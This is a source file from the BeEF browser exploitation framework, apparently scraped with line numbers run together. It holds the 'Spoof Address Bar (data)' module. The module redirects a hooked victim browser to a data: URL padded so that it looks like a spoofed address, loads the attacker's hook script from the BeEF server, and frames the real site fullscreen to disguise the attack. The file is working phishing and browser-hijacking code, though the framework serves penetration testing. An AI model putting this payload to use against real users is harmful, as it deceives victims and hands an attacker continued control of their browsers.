Path: blob/master/modules/social_engineering/spoof_addressbar_data/command.js
1873 views
//1// Copyright (c) 2006-2026Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;910try {11window.location = "data:text/html,<%= @spoofed_url %><%= ' '*1337 %>?<script src='"+hook+"'></script><script>document.title='<%= @spoofed_url %>';beef.dom.createIframe('fullscreen',{'src':'<%= @real_url %>'},{},null);</script>"12beef.debug("[Spoof Address Bar (data)] Redirecting to data URL...");13} catch (e) {14beef.debug("[Spoof Address Bar (data)] could not redirect: "+e.message)15beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=something went horribly wrong: " + e.message, beef.are.status_error());16}1718});192021